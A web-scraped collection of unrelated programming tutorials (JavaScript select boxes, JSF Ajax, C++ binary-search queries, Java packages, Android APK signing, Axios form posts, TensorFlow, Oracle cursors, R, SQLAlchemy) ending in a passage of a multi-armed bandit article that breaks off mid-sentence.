Better hand model: Creating a robust benchmark to evaluate the underlying hand model, and collecting additional data that improves accuracy and robustness metrics.

Additional vocabulary: As I worked through building the samples, one thing that became apparent is the limited vocabulary of this interaction method. There is clearly a need to support at least one more state, perhaps a fist and an open hand. This will mean re-labelling the dataset (or some semi-supervised approaches).

Additional model quantization: Right now, we are using the fastest model with respect to architecture size and accuracy: MobileNetV2 with SSD. Are there optimizations that can make things even faster? Any ideas or contributions here are welcome.

If you would like to discuss this in more detail, feel free to reach out on Twitter, Github or Linkedin. Many thanks to Kesa Oluwafunmilola, who helped with proofreading this article.

[1] Sandler, Mark, et al. "Mobilenetv2: Inverted residuals and linear bottlenecks." Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2018. https://arxiv.org/abs/1801.04381

[2] Tensorflow.js Coco-ssd example. This library uses code and guidance from the Tensorflow.js coco-ssd example, which provides a library for object detection trained on the MSCOCO dataset. The optimizations suggested in the repo (stripping out a post processing layer) were really helpful (2x speedup).
How to programmatically set the value of a select box element using JavaScript?
We can set the value of a select box programmatically with JavaScript as shown below. Suppose we have the following select box −

<select id="my-select" value="1">
   <option value="1">Select</option>
   <option value="2">Apple</option>
   <option value="3">Strawberry</option>
   <option value="4">Cherry</option>
   <option value="5">Guava</option>
</select>

To set the value of this select element, we first access it using querySelector and then assign to its value property. For example −

// Search the select box
const mySelectBox = document.querySelector('#my-select');
// Set the value to 3 (Strawberry)
mySelectBox.value = 3;
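Two related details are worth keeping in mind. Assigning to value does not fire the select box's change event, so any listeners have to be notified manually, and you may sometimes only know the visible label rather than the option value. The sketch below (our own illustration, using the same #my-select element from the example above) covers both cases:

const selectBox = document.querySelector('#my-select');

// 1. Notify listeners after a programmatic change.
selectBox.value = '4'; // Cherry
selectBox.dispatchEvent(new Event('change', { bubbles: true }));

// 2. Select an option by its visible text instead of its value.
function selectByText(select, text) {
    for (const option of select.options) {
        if (option.text === text) {
            select.value = option.value;
            return true;
        }
    }
    return false; // no matching option found
}

selectByText(selectBox, 'Guava');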
JSF - Ajax
AJAX stands for Asynchronous JavaScript and XML. Ajax is a technique that uses the XMLHttpRequest object of JavaScript to send data to the server and receive data from the server asynchronously. Using the Ajax technique, JavaScript code exchanges data with the server and updates parts of the web page without reloading the whole page.

JSF provides excellent support for making Ajax calls. It provides the f:ajax tag to handle Ajax requests.

<f:ajax execute = "input-component-name" render = "output-component-name" />

disabled
If true, the Ajax behavior is disabled and will not be applied to the component. The default is false.

event
The event that will invoke Ajax requests, for example "click", "change", "blur", "keypress", etc.

execute
A space-separated list of IDs for components that should be included in the Ajax request.

immediate
If "true", behavior events generated from this behavior are broadcast during the Apply Request Values phase. Otherwise, the events will be broadcast during the Invoke Application phase.

listener
An EL expression for a method in a backing bean to be called during the Ajax request.

onerror
The name of a JavaScript callback function that will be invoked if there is an error during the Ajax request.

onevent
The name of a JavaScript callback function that will be invoked to handle UI events.

render
A space-separated list of IDs for components that will be updated after an Ajax request.

Let us create a test JSF application to test the f:ajax tag.

package com.tutorialspoint.test;

import java.io.Serializable;

import javax.faces.bean.ManagedBean;
import javax.faces.bean.SessionScoped;

@ManagedBean(name = "userData", eager = true)
@SessionScoped
public class UserData implements Serializable {
   private static final long serialVersionUID = 1L;
   private String name;

   public String getName() {
      return name;
   }

   public void setName(String name) {
      this.name = name;
   }

   public String getWelcomeMessage() {
      return "Hello " + name;
   }
}

<?xml version = "1.0" encoding = "UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns = "http://www.w3.org/1999/xhtml"
   xmlns:h = "http://java.sun.com/jsf/html"
   xmlns:f = "http://java.sun.com/jsf/core"
   xmlns:tp = "http://java.sun.com/jsf/composite/tutorialspoint">

   <h:head>
      <title>JSF tutorial</title>
   </h:head>

   <h:body>
      <h2>Ajax Example</h2>

      <h:form>
         <h:inputText id = "inputName" value = "#{userData.name}"></h:inputText>
         <h:commandButton value = "Show Message">
            <f:ajax execute = "inputName" render = "outputMessage" />
         </h:commandButton>
         <h2><h:outputText id = "outputMessage"
            value = "#{userData.welcomeMessage != null ?
            userData.welcomeMessage : ''}"
            /></h2>
      </h:form>
   </h:body>
</html>

Once you are ready with all the changes, compile and run the application as we did in the JSF - First Application chapter. If everything is fine with your application, this will produce the following result.

Enter the name and press the Show Message button. You will see the result without a page refresh/form submit.
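As an illustration of the listener and event attributes described above, the same form could also update the greeting on every keystroke and invoke a bean method. This variant is our own sketch, not part of the original example; the nameChanged method is a hypothetical addition to the UserData bean.

<h:form>
   <h:inputText id = "inputName" value = "#{userData.name}">
      <f:ajax event = "keyup" execute = "inputName" render = "outputMessage"
         listener = "#{userData.nameChanged}" />
   </h:inputText>
   <h2><h:outputText id = "outputMessage" value = "#{userData.welcomeMessage}" /></h2>
</h:form>

And in the backing bean:

// Added to the UserData bean for this sketch.
public void nameChanged(javax.faces.event.AjaxBehaviorEvent event) {
   // Invoked on every Ajax request, before the response is rendered.
   System.out.println("Name is now: " + name);
}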
Queries for greater than and not less than using C++
In this article, we are given an array, and there are two types of queries we need to answer.

Type 0 − count the elements that are greater than or equal to x (the given value).

Type 1 − count the elements that are strictly greater than x (the given value).

So here is a simple example −

Input : arr[] = { 10, 15, 30, 40, 45 } and Q = 3
   Query 1: 0 50
   Query 2: 1 40
   Query 3: 0 30
Output :
   0
   1
   3
Explanation:
x = 50, q = 0 : No elements are greater than or equal to 50.
x = 40, q = 1 : 45 is greater than 40.
x = 30, q = 0 : three elements 30, 40, 45 are greater than or equal to 30.

We can use two different methods to find the solution. First we will use the brute force solution and check whether it can work for higher constraints or not. If not, we proceed to optimize our solution.

In this approach, we traverse the whole array for each of the q queries and count the numbers that satisfy the given condition.

#include <bits/stdc++.h>
using namespace std;
void query(int *arr, int n, int type, int val) {
   int count = 0; // answer
   if(!type) { // when a type 0 query is asked
      for(int i = 0; i < n; i++) {
         if(arr[i] >= val)
            count++;
      }
   } else { // when a type 1 query is asked
      for(int i = 0; i < n; i++) {
         if(arr[i] > val)
            count++;
      }
   }
   cout << count << "\n";
}
int main() {
   int ARR[] = { 10, 15, 30, 40, 45 };
   int n = sizeof(ARR)/sizeof(ARR[0]); // size of our array
   query(ARR, n, 0, 50); // query 1
   query(ARR, n, 1, 40); // query 2
   query(ARR, n, 0, 30); // query 3
   return 0;
}

0
1
3

In the above approach, we simply traverse the array and calculate the answer for each query. This works for the given examples, but for higher constraints it will be too slow, as the overall time complexity of the program is O(N*Q), where N is the size of the array and Q is the number of queries. We will now optimize this approach so that it works for higher constraints as well.

In this approach, we use binary search to find the lower bound or upper bound of the given value. We first sort the array and then apply our lower bound and upper bound functions accordingly.

#include <bits/stdc++.h>
using namespace std;
void lowerbound(int *arr, int n, int val) {
   int l = -1, r = n;
   while(r - l > 1) { // binary searching the answer
      int mid = (l+r)/2;
      if(arr[mid] >= val)
         r = mid;
      else
         l = mid;
   }
   if(r == n) // if r is unmoved, no element satisfies the condition
      cout << "0\n";
   else
      cout << n - r << "\n";
}
void upperbound(int *arr, int n, int val) {
   int l = -1, r = n;
   while(r - l > 1) { // binary searching the answer
      int mid = (l+r)/2;
      if(arr[mid] > val)
         r = mid;
      else
         l = mid;
   }
   if(r == n) // if r is unmoved, no element satisfies the condition
      cout << "0\n";
   else
      cout << n - r << "\n";
}
void query(int *arr, int n, int type, int val) {
   if(!type) // if type == 0 we call the lowerbound function
      lowerbound(arr, n, val);
   else // if type == 1 we call the upperbound function
      upperbound(arr, n, val);
}
int main() {
   int arr[] = { 1, 2, 3, 4 };
   int n = sizeof(arr)/sizeof(arr[0]); // size of our array
   sort(arr, arr+n); // sorting the array
   query(arr, n, 0, 5); // query 1
   query(arr, n, 1, 3); // query 2
   query(arr, n, 0, 3); // query 3
   return 0;
}

0
1
2

The above code uses binary search, which decreases the time complexity substantially: sorting costs O(N*logN) and each query is then answered in O(logN), so the overall complexity is O((N + Q)*logN), where N is the size of the array and Q is the number of queries.

To recap the idea: binary search works only on sorted data, so we first sort the array. We then write lower bound and upper bound functions that find the first element satisfying the type 0 and type 1 conditions, respectively. Because the array is sorted, every element after that first element also satisfies the condition, so we print the difference between N (the size of the array) and the index of that element.
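As a side note, the two hand-written binary searches above compute exactly what std::lower_bound and std::upper_bound from the standard <algorithm> header already provide, so the query function can also be written as the following sketch (same sorted array and query types as above):

#include <bits/stdc++.h>
using namespace std;

// type 0: count elements >= val, type 1: count elements > val
void query(const vector<int> &sortedArr, int type, int val) {
   auto it = (type == 0)
      ? lower_bound(sortedArr.begin(), sortedArr.end(), val)  // first element >= val
      : upper_bound(sortedArr.begin(), sortedArr.end(), val); // first element > val
   cout << (sortedArr.end() - it) << "\n";
}

int main() {
   vector<int> arr = { 1, 2, 3, 4 };
   sort(arr.begin(), arr.end());
   query(arr, 0, 5); // prints 0
   query(arr, 1, 3); // prints 1
   query(arr, 0, 3); // prints 2
   return 0;
}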
In this approach, we use binary search to find the lower bound and the upper bound of the given value. Because binary search works only on sorted data, we first sort the array. We then write lower-bound and upper-bound functions that find the index of the first element satisfying the type 0 and type 1 conditions, respectively. Since the array is sorted, every element after that index also satisfies the condition, so the answer is the difference between N (the size of the array) and that index.

In this article, we solved the problem of answering "greater than" and "not less than" queries using binary search. We covered the C++ programs for this problem and the complete approach (brute-force and efficient) by which we solved it. The same program can be written in other languages such as C, Java, and Python. We hope you find this article helpful.
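As a side note (not part of the original solution), the C++ standard library already ships binary-search helpers, so the same queries can be answered with std::lower_bound and std::upper_bound on the sorted array; the sketch below reuses the data from the first example −

#include <bits/stdc++.h>
using namespace std;

int main() {
   vector<int> arr = { 10, 15, 30, 40, 45 };
   sort(arr.begin(), arr.end());   // binary search needs sorted data
   int n = arr.size();
   // type 0: count of elements >= x  ->  n - (index of first element >= x)
   cout << n - (lower_bound(arr.begin(), arr.end(), 50) - arr.begin()) << "\n"; // 0
   // type 1: count of elements > x   ->  n - (index of first element > x)
   cout << n - (upper_bound(arr.begin(), arr.end(), 40) - arr.begin()) << "\n"; // 1
   cout << n - (lower_bound(arr.begin(), arr.end(), 30) - arr.begin()) << "\n"; // 3
   return 0;
}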
How to use classes in another package in Java
You can understand it using an example where a Boss class is defined in the payroll package.

package payroll;
public class Boss {
   public void payEmployee(Employee e) {
      e.mailCheck();
   }
}

What if the Employee class is not in the payroll package? The Boss class must then use one of the following techniques for referring to a class in a different package.

The fully qualified name of the class can be used. For example −

payroll.Employee

The package can be imported using the import keyword and the wildcard (*). For example −

import payroll.*;

The class itself can be imported using the import keyword. For example −

import payroll.Employee;
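For illustration, here is a hedged sketch of a class in a different package applying these techniques. The package name accounts and the class name AccountsBoss are made up for this example, and it assumes Employee (with its mailCheck() method) is declared public inside the payroll package.

package accounts;            // a different package from payroll

import payroll.Employee;     // technique 3: import the class itself
// import payroll.*;         // technique 2: a wildcard import would also work

public class AccountsBoss {
   // resolved through the import statement above
   public void payEmployee(Employee e) {
      e.mailCheck();
   }

   // technique 1: the fully qualified name works without any import
   public void payEmployeeQualified(payroll.Employee e) {
      e.mailCheck();
   }
}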
Publishing Android Application
Android application publishing is a process that makes your Android applications available to users. In fact, publishing is the last phase of the Android application development process.

Once you have developed and fully tested your Android application, you can start selling or distributing it for free using Google Play (a famous Android marketplace). You can also release your applications by sending them directly to users or by letting users download them from your own website.

You can check a detailed publishing process at the Android official website, but this tutorial will take you through simple steps to launch your application on Google Play. Here is a simplified checklist which will help you in launching your Android application −

Before exporting the app, you need a few tools −

Dx tool (Dalvik executable tool): It converts .class files to .dex files. It is useful for memory optimization and reduces boot-up time.

AAPT (Android Asset Packaging Tool): It is used to package the .dex files into an .apk.

APK (Android Package Kit): The final output of the deployment process is the .apk file.

You will need to export your application as an APK (Android Package) file before you upload it to the Google Play marketplace.

To export an application, just open that application project in Android Studio, select Build → Generate Signed APK and follow the simple steps to export your application −

Next, select the Generate Signed APK option as shown in the above screenshot and then click it so that you get the following screen, where you will choose Create new keystore to store your application.

Enter your key store path, key store password, key alias and key password to protect your application and click on the Next button once again. It will display the following screen to let you create an application −

Once you have filled in all the information, like app destination, build type and flavours, click the Finish button. While creating the application, it will show as below.

Finally, it will generate your Android application as an APK format file which will be uploaded to the Google Play marketplace.

The most important step is to register with Google Play using the Google Play Marketplace. You can use your existing Google ID if you have one; otherwise you can create a new Google ID and then register with the marketplace. You will see the following screen to accept the terms and conditions.

You can use the Continue to payment button to proceed to make a payment of $25 as a registration fee and finally complete your account details.

Once you are a registered user at Google Play, you can upload the release-ready APK for your application and finally complete the application details using the application detail page, as mentioned in step 9 of the above checklist.

You do not need Android Studio to sign your app. You can sign your app from the command line using standard tools from the Android SDK and the JDK.
To sign an app in release mode from the command line −

Generate a private key using keytool −

$ keytool -genkey -v -keystore my-release-key.keystore
-alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Compile your app in release mode to obtain an unsigned APK.

Sign your app with your private key using jarsigner −

$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1
-keystore my-release-key.keystore my_application.apk alias_name

Verify that your APK is signed. For example −

$ jarsigner -verify -verbose -certs my_application.apk

Align the final APK package using zipalign −

$ zipalign -v 4 your_project_name-unaligned.apk your_project_name.apk

Some popular marketplaces where you can publish your Android application are −

Google Play
Phoload
APTOiDE
Amazon AppStore
1mobile
Insyde Market
Yandex Store
F-Droid
Samsung Galaxy AppStore
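Alternatively, signing can be configured once in the module-level Gradle build file so that release builds are signed automatically. The snippet below is only a sketch — the keystore file name, alias, and passwords are placeholders that must match the key generated with keytool above.

android {
   signingConfigs {
      release {
         storeFile file("my-release-key.keystore")   // path to your keystore
         storePassword "your_keystore_password"
         keyAlias "alias_name"
         keyPassword "your_key_password"
      }
   }
   buildTypes {
      release {
         signingConfig signingConfigs.release        // sign release builds with this key
      }
   }
}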
How to post a file from a form with Axios? - GeeksforGeeks
10 Sep, 2020

In this article, we are going to discuss making POST requests with form data using the Axios library. Axios is a Promise based HTTP client that can be used for the web as well as for Node.js development. However, in this article, we are going to strictly refer to the client-side use of Axios.

To start off, we need to add Axios to our development by using a CDN link:

<script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"> </script>

In order to extract data from our form, we are going to use the FormData() method. The FormData method converts the data entered into the form into key-value pairs and creates a multipart/form-data object.

HTML:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.19.2/axios.min.js" crossorigin="anonymous">
    </script>
    <title>Document</title>
</head>
<body>
    <h3 style="color:green; font-size:25px;">
      Geeks For Geeks
    </h3>
    <form>
      <input name="first-name"/><br>
      <input name="last-name"/><br>
      <input name="address"/><br>
      <button type="submit">Submit</button>
    </form>
</body>
</html>

Output:

Axios Post Request Syntax
There are two ways to make an Axios post request:

Standard post request:

axios.post(url, data).then(callbackFn()).catch(callbackFn(err))

url : The request url for HTTP POST.
data : An object containing the POST data.
callbackFn() : Callback functions to handle the promise.

Post request with a configuration object:

axios({
   method : 'post',
   url : url,
   data : data,
   headers : headers
}).then(callbackFn()).catch(callbackFn())

method : specifies the HTTP method.
data : an object containing the POST data.
headers (optional) : An object to specify the headers associated with the request.
Javascript code to send form data to the server:

window.addEventListener('load', ()=>{
    const form = document.querySelector('form');
    form.addEventListener('submit', (e)=>{
      // to prevent reload
      e.preventDefault();
      // creates a multipart/form-data object
      let data = new FormData(form);
      axios({
         method : 'post',
         url : '/',
         data : data,
      })
      .then((res)=>{
         console.log(res);
      })
      .catch((err) => {throw err});
    });
});

Testing the Axios request with a mock REST API:

Front End Code:

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.19.2/axios.min.js" integrity="sha512-VZ6m0F78+yo3sbu48gElK4irv2dzPoep8oo9LEjxviigcnnnNvnTOJRSrIhuFk68FMLOpiNz+T77nNY89rnWDg==" crossorigin="anonymous"></script>
    <title>Document</title>
  </head>
  <body>
    <h3 style="color: green; font-size: 25px;">
      Geeks For Geeks
    </h3>
    <form>
      <input name="first-name" /><br />
      <input name="last-name" /><br />
      <input name="address" /><br />
      <button type="submit">Submit</button>
    </form>
    <script type="text/javascript">
      window.addEventListener("load", () => {
        const form = document.querySelector("form");
        form.addEventListener("submit", (e) => {
          e.preventDefault();
          let data = new FormData(form);
          console.log(data);
          axios({
            method: "post",
            url: "/",
            data: data,
          })
            .then((res) => {
              console.log(res);
            })
            .catch((err) => {
              throw err;
            });
        });
      });
    </script>
  </body>
</html>

Code for the Node.js based mock REST API:

const express = require('express');
const formidable = require('express-formidable');

const app = express();

app.use(express.static(__dirname+'/index.html'));
app.use(formidable());

app.get('/', (req, res)=>{
   res.sendFile(__dirname+'/index.html');
});

app.post('/', (req, res)=>{
   console.log(JSON.stringify(req.fields));
   res.send(req.fields); // respond so the client request completes
});

app.listen('3000', ()=>{
   console.log('listening to port');
});

Sample Request Data:

Output in console:

{"first-name":"Geeks", "last-name":"Geeks", "address":"Noida"}
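As a side note (not part of the original article), the same request can also be written with the axios.post shorthand; when a FormData object is passed as the body from the browser, the multipart/form-data boundary header is set automatically:

// Hypothetical shorthand equivalent of the axios({...}) call above
const data = new FormData(document.querySelector("form"));
axios.post("/", data)
   .then((res) => console.log(res.data))
   .catch((err) => console.error(err));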
How can Tensorflow be used to configure the dataset for performance?
The flower dataset can be configured for performance with the help of buffered prefetching, the shuffle method, and the cache method. Buffered prefetching can be used to ensure that the data can be taken from disk without having I/O become blocking. Dataset.cache() keeps the images in memory after they have been loaded off disk during the first epoch. Dataset.prefetch() will overlap the data preprocessing and model execution while training.

Read More: What is TensorFlow and how Keras work with TensorFlow to create Neural Networks?

The Keras Sequential API is used, which is helpful in building a sequential model that is used to work with a plain stack of layers, where every layer has exactly one input tensor and one output tensor.

We are using Google Colaboratory to run the below code. Google Colab or Colaboratory helps run Python code over the browser, requires zero configuration, and gives free access to GPUs (Graphical Processing Units). Colaboratory has been built on top of Jupyter Notebook.

print("Configuring the dataset for better performance")
AUTOTUNE = tf.data.AUTOTUNE
train_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)
val_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)

Code credit: https://www.tensorflow.org/tutorials/images/classification

Configuring the dataset for better performance

The concept of buffered prefetching can be used so that the data can be taken from disk without having I/O become blocking. There are two important methods that can be used when loading data −

cache() keeps the images in memory after they have been loaded off disk during the first epoch. This will ensure that the dataset doesn't become a bottleneck when the model is being trained. If the dataset is too large to fit into memory, this method can be used to create a performant on-disk cache.

prefetch() will overlap the data preprocessing and model execution while training.
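For context, here is a hedged sketch of how train_ds and val_ds might be created before the lines above are applied; the directory name, image size, and batch size are assumptions for illustration, loosely following how the linked tutorial loads the flower dataset.

import tensorflow as tf

img_height, img_width, batch_size = 180, 180, 32

# build training and validation datasets from an image folder (path is a placeholder)
train_ds = tf.keras.utils.image_dataset_from_directory(
   "flower_photos", validation_split=0.2, subset="training", seed=123,
   image_size=(img_height, img_width), batch_size=batch_size)
val_ds = tf.keras.utils.image_dataset_from_directory(
   "flower_photos", validation_split=0.2, subset="validation", seed=123,
   image_size=(img_height, img_width), batch_size=batch_size)

# configure for performance, exactly as described above
AUTOTUNE = tf.data.AUTOTUNE
train_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)
val_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)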
Cursors in Oracle DBMS
When a SQL statement is executed in Oracle, a temporary context area is created. This area contains all the relevant information relating to the statement and its execution. The cursor is a pointer to this context area and allows the PL/SQL program to control this area.

There are two types of cursors −

Implicit Cursors

Explicit Cursors

Let us begin with Implicit Cursors −

Whenever an SQL statement is executed, the implicit cursors are automatically created. This happens if there is no explicit cursor for the particular statement. Implicit cursors cannot be controlled by the programmers.

There are many different attributes for implicit cursors. Some of them are −

%FOUND − If one or more records were affected successfully by commands such as INSERT, UPDATE, DELETE etc., then it returns TRUE. Otherwise it returns FALSE.

%NOTFOUND − This is the direct opposite of %FOUND. If one or more records were affected successfully by commands such as INSERT, UPDATE, DELETE etc., then it returns FALSE. Otherwise it returns TRUE.

%ROWCOUNT − This returns the number of rows that are affected by different commands such as INSERT, UPDATE, DELETE etc.

%ISOPEN − This returns TRUE if the cursor is open and FALSE otherwise. However, for implicit cursors, the value is always FALSE because the cursor is closed immediately after executing its instruction.

While implicit cursors are automatically created, explicit cursors are specifically created by the programmers. Their definition is provided in the declaration section of the PL/SQL block.

Creating an explicit cursor has the following steps −

The cursor is declared as follows. Here, the cursor is c_student −

CURSOR c_student IS
Select Stu_ID,Stu_Name from Student;

The cursor is opened as follows −

OPEN c_student;

One row at a time is accessed while fetching the cursor. Fetching the cursor is done as follows −

FETCH c_student INTO
c_stuID, c_stuName;

The allocated memory is released when the cursor is closed. This is done as follows −

CLOSE c_student;
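Putting the four steps together, a minimal sketch of a complete PL/SQL block that loops over the cursor looks like this; it reuses the Student table and variable names from the snippets above and assumes the columns exist with matching types.

DECLARE
   c_stuID    Student.Stu_ID%TYPE;
   c_stuName  Student.Stu_Name%TYPE;
   CURSOR c_student IS
      SELECT Stu_ID, Stu_Name FROM Student;
BEGIN
   OPEN c_student;
   LOOP
      FETCH c_student INTO c_stuID, c_stuName;
      EXIT WHEN c_student%NOTFOUND;   -- explicit cursors expose the same attributes
      dbms_output.put_line(c_stuID || ' ' || c_stuName);
   END LOOP;
   CLOSE c_student;
END;
/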
How to change the name of a data frame in R?
To change the name of a data frame, we can simply assign the data frame stored under the original name to the new name. After the assignment, both of the names can be used. Most of the time, the purpose behind changing the name of a data frame is that the original name does not seem to be a valid name based on the characteristics of the data. For example, if we have normally distributed columns in the data frame then we can name it normal_distribution. This will help everyone to understand that the data belongs to a normal distribution.

set.seed(24)
x<-rnorm(20,1,0.25)
df1<-data.frame(x)
df1

          x
1  0.8635298
2  1.1341463
3  1.1049058
4  0.8540932
5  1.2118650
6  1.0665055
7  1.1111463
8  0.8833762
9  0.7879075
10 1.0005780
11 0.6707730
12 1.1495673
13 0.8094464
14 0.6427274
15 1.0830611
16 0.8827348
17 0.9162533
18 1.3840630
19 1.1524986
20 1.1290839

Changing the name of df1 to Normal_Distribution −

Normal_Distribution<-df1
Normal_Distribution

          x
1  0.8635298
2  1.1341463
3  1.1049058
4  0.8540932
5  1.2118650
6  1.0665055
7  1.1111463
8  0.8833762
9  0.7879075
10 1.0005780
11 0.6707730
12 1.1495673
13 0.8094464
14 0.6427274
15 1.0830611
16 0.8827348
17 0.9162533
18 1.3840630
19 1.1524986
20 1.1290839

y<-sample(0:5,20,replace=TRUE)
df2<-data.frame(y)
df2

   y
1  4
2  2
3  2
4  3
5  3
6  1
7  1
8  2
9  0
10 4
11 4
12 3
13 5
14 1
15 0
16 0
17 4
18 2
19 2
20 5

Changing the name of df2 to Random_Sample −

Random_Sample<-df2
Random_Sample

   y
1  4
2  2
3  2
4  3
5  3
6  1
7  1
8  2
9  0
10 4
11 4
12 3
13 5
14 1
15 0
16 0
17 4
18 2
19 2
20 5
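If only the new name should remain after the assignment, the old binding can be removed with rm(); a small optional sketch −

Random_Sample<-df2
rm(df2)          # df2 no longer exists; Random_Sample still holds the data
exists("df2")    # FALSE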
SQLAlchemy Core - Selecting Rows
In this chapter, we will discuss the concept of selecting rows from the table object.

The select() method of the table object enables us to construct a SELECT expression.

s = students.select()

The select object translates to a SELECT query by the str(s) function as shown below −

'SELECT students.id, students.name, students.lastname FROM students'

We can use this select object as a parameter to the execute() method of the connection object as shown in the code below −

result = conn.execute(s)

When the above statement is executed, the Python shell echoes the following equivalent SQL expression −

SELECT students.id, students.name, students.lastname
FROM students

The result variable is the equivalent of a cursor in DBAPI. We can now fetch records using the fetchone() method.

row = result.fetchone()

All selected rows in the table can be printed by a for loop as given below −

for row in result:
   print (row)

The complete code to print all rows from the students table is shown below −

from sqlalchemy import create_engine, MetaData, Table, Column, Integer, String
engine = create_engine('sqlite:///college.db', echo = True)
meta = MetaData()

students = Table(
   'students', meta, 
   Column('id', Integer, primary_key = True), 
   Column('name', String), 
   Column('lastname', String), 
)

s = students.select()
conn = engine.connect()
result = conn.execute(s)

for row in result:
   print (row)

The output shown in the Python shell is as follows −

(1, 'Ravi', 'Kapoor')
(2, 'Rajiv', 'Khanna')
(3, 'Komal', 'Bhandari')
(4, 'Abdul', 'Sattar')
(5, 'Priya', 'Rajhans')

The WHERE clause of a SELECT query can be applied by using Select.where(). For example, if we want to display rows with id > 2 −

s = students.select().where(students.c.id>2)
result = conn.execute(s)

for row in result:
   print (row)

Here the c attribute is an alias for column. The following output will be displayed on the shell −

(3, 'Komal', 'Bhandari')
(4, 'Abdul', 'Sattar')
(5, 'Priya', 'Rajhans')

Here, we have to note that the select object can also be obtained by the select() function in the sqlalchemy.sql module. The select() function requires the table object as argument.

from sqlalchemy.sql import select
s = select([students])
result = conn.execute(s)
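As an aside (not part of the original chapter), multiple conditions can be combined inside where() with the and_() construct; the sketch below reuses the students table defined above −

from sqlalchemy import and_

# select rows with id > 2 whose lastname contains the letter 'r'
s = students.select().where(
   and_(students.c.id > 2, students.c.lastname.like('%r%'))
)
for row in conn.execute(s):
   print (row)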
Solving the Multi-Armed Bandit Problem | by Anson Wong | Towards Data Science
The multi-armed bandit problem is a classic reinforcement learning example where we are given a slot machine with n arms (bandits) with each arm having its own rigged probability distribution of success. Pulling any one of the arms gives you a stochastic reward of either R=+1 for success, or R=0 for failure. Our objective is to pull the arms one-by-one in sequence such that we maximize our total reward collected in the long run.

The non-triviality of the multi-armed bandit problem lies in the fact that we (the agent) cannot access the true bandit probability distributions — all learning is carried out via the means of trial-and-error and value estimation. So the question is:

How can we design a systematic strategy that adapts to these stochastic rewards?

This is our goal for the multi-armed bandit problem, and having such a strategy would prove very useful in many real-world situations where one would like to select the “best” bandit out of a group of bandits i.e. A/B testing, line-up optimization, evaluating social media influence.

In this article, we approach the multi-armed bandit problem with a classical reinforcement learning technique of an epsilon-greedy agent with a learning framework of reward-average sampling to compute the action-value Q(a) to help the agent improve its future action decisions for long-term reward maximization. The Python code implementation of this multi-armed bandit algorithm solution can be found at my Github at:

https://github.com/ankonzoid/LearningX/tree/master/classical_RL/multiarmed_bandit

Please refer to our Appendix for more details about the epsilon-greedy agent, and how the reward-average sampling method is used to iteratively update Q(a). In the next section, we explain the results of deploying such an agent in the multi-armed bandit environment.

More of my blogs, tutorials, and projects on Deep Learning and Reinforcement Learning can be found at my Medium and at my Github.

Consider our Python code example of 10 hard-coded bandits each with their own individual success probabilities (remember that our agent is blind to these numbers, it can only realize them via sampling the bandits individually):

Bandit #1 = 10% success rate
Bandit #2 = 50% success rate
Bandit #3 = 60% success rate
Bandit #4 = 80% success rate (best)
Bandit #5 = 10% success rate
Bandit #6 = 25% success rate
Bandit #7 = 60% success rate
Bandit #8 = 45% success rate
Bandit #9 = 75% success rate (2nd best)
Bandit #10 = 65% success rate (3rd best)

By inspection, we expect the agent in the long term to pick out Bandit #4 as the strongest signal, with Bandit #9 following second, and Bandit #10 following third, etc.

Now to the results. We performed 2,000 experiments for the agent to start from scratch with epsilon exploration probability of 10%, and trained the agent for 10,000 episodes per experiment. The average proportion of bandits chosen by the agent as a function of episode number is depicted in Fig 1.

In Fig 1, we can see that the selection choice of bandits is uniformly distributed at ~10% amongst all bandits near the beginning of training (< 10 episodes) as the agent is in its exploratory phase of not knowing which bandits to take advantage of yet. It is not until we reach later episodes (> 100 episodes) that we see a clear greedy mechanism take precedence in deciding which bandits should get more priority because of the rewards sampled so far. As expected, Bandits #4, #9, and #10 at this mid-to-late training phase are the ones that get chosen by the agent.
Lastly and almost inevitably, the agent tends to almost always choose Bandit #4 as the “best” bandit at the end of training with a plateau of ~90% (since ~10% should always remain because of the fixed epsilon exploration parameter).

Although the optimal policy is to select Bandit #4 in this problem, you will notice that this does not mean that pulling Bandit #4 will always beat any other bandit on a given pull since the rewards are stochastic; it is in the long-term reward average that you will find Bandit #4 to dominate.

Also, there is nothing particularly special about using our agent to approach this problem — it is just one of many methods that can adaptively maximize the collection of long-term rewards. There definitely exist situations where a completely exploratory (epsilon = 100%), or a completely greedy agent (epsilon = 0%), or anything in between, could end up collecting more rewards for a finite number of episodes than our epsilon=10%-greedy agent.

The main appeal of deploying such an agent, in my perspective, is the automation of minimizing re-choosing bandits that have already shown some evidence of failure. From a business and practical perspective, this can save a lot of time and resources that would otherwise be wasted in the optimization process of finding the “best” bandit.

In a nutshell, the epsilon-greedy agent is a hybrid of a (1) completely-exploratory agent and a (2) completely-greedy agent. In the multi-armed bandit problem, a completely-exploratory agent will sample all the bandits at a uniform rate and acquire knowledge about every bandit over time; the caveat of such an agent is that this knowledge is never utilized to help itself to make better future decisions! On the other extreme, a completely-greedy agent will choose a bandit and stick with its choice for the rest of eternity; it will not make an effort to try out other bandits in the system to see whether they have better success rates to help it maximize its long-term rewards, thus it is very narrow-minded!

To get a somewhat desirable agent that possesses the best of both worlds, the epsilon-greedy agent is designed to give an epsilon chance (say for example 10%) towards exploring bandits randomly at any state, and acts greedily on its current ‘best’ bandit value estimate for all other times. The intuition surrounding this is that the greedy mechanism helps the agent focus on its currently most “successful” bandits, and the exploratory mechanism gives the agent the chance to explore for better bandits that might be out there. The only thing left is: how do we define a notion of “value” of a bandit to the agent so that it can choose greedily?

Borrowing from reinforcement learning, we can define the action-value function Q(s, a) to represent the expected long-term reward of taking action a from state s. In our case of the multi-armed bandit, each action brings the agent to a terminal state so long-term rewards are exactly the immediate rewards, and we simplify the notation of the definition of the action-value to the average of the rewards collected so far,

